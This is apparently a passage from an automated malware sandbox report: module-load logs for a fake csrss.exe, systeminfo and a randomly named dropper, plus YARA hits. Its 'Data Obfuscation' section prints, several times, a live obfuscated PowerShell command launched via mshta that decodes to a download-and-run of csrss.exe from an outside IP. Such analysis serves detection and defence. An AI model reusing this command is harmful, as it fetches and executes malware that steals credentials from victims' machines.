                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: zipfldr.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: url.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ieframe.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: archiveint.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ieproxy.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: mssip32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: smartscreenps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??????????.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ???.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ???.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ???.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ?.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ?.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ????.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ???e???????????.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ???e???????????.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ?.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ?.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ?.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ?.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??l.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: tquery.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: cryptdll.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: spp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: vssapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: vsstrace.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: endpointdlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: endpointdlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: endpointdlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: endpointdlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: advapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: sppwmi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: sppcext.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: winscard.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: devobj.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Users\user\Links\iaoqralA.pifSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: ieframe.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: winsqlite3.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeSection loaded: wininet.dll
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeSection loaded: mswsock.dll
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeSection loaded: dnsapi.dll
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeSection loaded: iphlpapi.dll
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeSection loaded: fwpuclnt.dll
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
                        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                        Source: Binary string: sysinfo.pdb source: iaoqralA.pif, 00000011.00000003.1552676010.000000003073C000.00000004.00000020.00020000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000014.00000003.1745667826.0000000000C85000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: sysinfo.pdbGCTL source: iaoqralA.pif, 00000011.00000003.1552676010.000000003073C000.00000004.00000020.00020000.00000000.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000014.00000003.1745667826.0000000000C85000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: easinvoker.pdb source: csrss.exe, 0000000C.00000003.1284464034.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1297030622.0000000002D70000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1357966873.000000007EFE0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1297030622.0000000002DC3000.00000004.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000002.1552868362.0000000000890000.00000040.00000400.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: iaoqralA.pif, 00000011.00000002.1578995083.0000000030C50000.00000040.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000002.1578995083.0000000030DEE000.00000040.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000003.1455002943.0000000030AA9000.00000004.00000020.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000003.1453030442.00000000308F8000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000002.3628185993.000000000446E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000003.1555580776.0000000004122000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000002.3628185993.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000003.1553037907.0000000003F7E000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: iaoqralA.pif, iaoqralA.pif, 00000011.00000002.1578995083.0000000030C50000.00000040.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000002.1578995083.0000000030DEE000.00000040.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000003.1455002943.0000000030AA9000.00000004.00000020.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000003.1453030442.00000000308F8000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, systeminfo.exe, 00000015.00000002.3628185993.000000000446E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000003.1555580776.0000000004122000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000002.3628185993.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000015.00000003.1553037907.0000000003F7E000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: q7C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.pdb source: powershell.exe, 00000003.00000002.1354721983.0000000005559000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: easinvoker.pdbGCTL source: csrss.exe, 0000000C.00000003.1284464034.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1297030622.0000000002D70000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1357966873.000000007EFE0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000002.1297030622.0000000002DC3000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000000C.00000003.1284975349.000000000088B000.00000004.00000020.00020000.00000000.sdmp, iaoqralA.pif, 00000011.00000002.1552868362.0000000000890000.00000040.00000400.00020000.00000000.sdmp
                        Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 4nHrKBXqqqVJFZFp.exe, 00000014.00000002.3626732569.00000000009BF000.00000002.00000001.01000000.0000000F.sdmp, 4nHrKBXqqqVJFZFp.exe, 00000016.00000000.1622712741.00000000009BF000.00000002.00000001.01000000.0000000F.sdmp

                        Data Obfuscation

                        barindex
                        Source: C:\Users\user\Links\iaoqralA.pifUnpacked PE file: 17.2.iaoqralA.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;
                        Source: Yara matchFile source: 12.2.csrss.exe.3800000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.csrss.exe.2856178.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.csrss.exe.2856178.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.1289661885.0000000002856000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; 